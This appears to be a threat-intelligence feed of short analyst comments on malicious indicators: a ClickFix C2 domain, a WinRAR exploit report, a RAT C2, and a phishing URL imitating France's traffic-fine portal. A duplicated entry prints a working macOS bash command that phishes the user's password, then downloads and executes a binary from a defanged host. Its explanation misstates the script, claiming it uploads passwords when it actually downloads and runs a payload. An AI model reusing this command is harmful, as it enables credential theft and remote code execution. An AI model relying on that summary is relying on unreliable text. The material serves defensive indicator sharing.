Clickfix C2 linked to domain merkantalolol[.]asia (188.114.97.3)
Payload is an obfuscated terminal ...
show moreClickfix C2 linked to domain merkantalolol[.]asia (188.114.97.3)
Payload is an obfuscated terminal command to open powershell and download "5c1e18e2.exe"
ANY.RUN run : https://app.any.run/tasks/37d87c42-2319-4dcb-8a18-28fc3ac94283
show less
winrar exploit
report :
https://publish.obsidian.md/koffei/%F0%9F%93%A1Koffei/Is+Winrar+or+not+Wi ...
show morewinrar exploit
report :
https://publish.obsidian.md/koffei/%F0%9F%93%A1Koffei/Is+Winrar+or+not+Winrar
show less
Date et heure : Dec. 8, 2025
Command :
```
`/bin/bash -c #!/bin/bash username=$(whoami) while tru ...
show moreDate et heure : Dec. 8, 2025
Command :
```
`/bin/bash -c #!/bin/bash username=$(whoami) while true; do echo -n "System Password: " read password echo if dscl . -authonly "$username" "$password" >/dev/null 2>&1; then echo -n "$password" > /tmp/.pass break else echo "Incorrect password! Try again." fi done curl -o /tmp/update hxxps[://]shrimpfc[.]com/ibkr/update >/dev/null 2>&1 echo "$password" | sudo -S xattr -c /tmp/update >/dev/null 2>&1 chmod +x /tmp/update /tmp/update`
```
Script used to:
- identify actively connected users
- open a loop requesting the user's password in a loop
- record attempted passwords in the [/tmp/update] file
- terminate the script by uploading the file containing the passwords to [hxxps[://]shrimpfc[.]com/ibkr/update]
This script was launched following the use of [runningboardd], an “RMM” type application used to manage application resources on MacOS.
(links cleaned)
show less
Date et heure : Dec. 8, 2025
Command :
```
`/bin/bash -c #!/bin/bash username=$(whoami) while tr ...
show moreDate et heure : Dec. 8, 2025
Command :
```
`/bin/bash -c #!/bin/bash username=$(whoami) while true; do echo -n "System Password: " read password echo if dscl . -authonly "$username" "$password" >/dev/null 2>&1; then echo -n "$password" > /tmp/.pass break else echo "Incorrect password! Try again." fi done curl -o /tmp/update hxxps[://]shrimpfc[.]com/ibkr/update >/dev/null 2>&1 echo "$password" | sudo -S xattr -c /tmp/update >/dev/null 2>&1 chmod +x /tmp/update /tmp/update`
```
Script used to:
- identify actively connected users
- open a loop requesting the user's password in a loop
- record attempted passwords in the [/tmp/update] file
- terminate the script by uploading the file containing the passwords to [hxxps[://]shrimpfc[.]com/ibkr/update]
This script was launched following the use of [runningboardd], an “RMM” type application used to manage application resources on MacOS.
(links cleaned)
show less
Command and control domain for "Uclient.exe" RAT https://app.any.run/tasks/a664d5b7-018b-4e21-9e76-d ...
show moreCommand and control domain for "Uclient.exe" RAT https://app.any.run/tasks/a664d5b7-018b-4e21-9e76-deee05e0407c
show less
Web scam emulating French Fine payement platform :
hxxps[://]lhabbabtours[.]bt/amendes-antai-gouv/ ...
show moreWeb scam emulating French Fine payement platform :
hxxps[://]lhabbabtours[.]bt/amendes-antai-gouv/Documents/embed?url=aHR0cHM6Ly9saGFiYmFidG91cnMuYnQvYW1lbmRlcy1hbnRhaS1nb3V2L0RvY3VtZW50cy8vY2FjaGUvUFZLRUJzdmp2a3piV1JETT8=
show less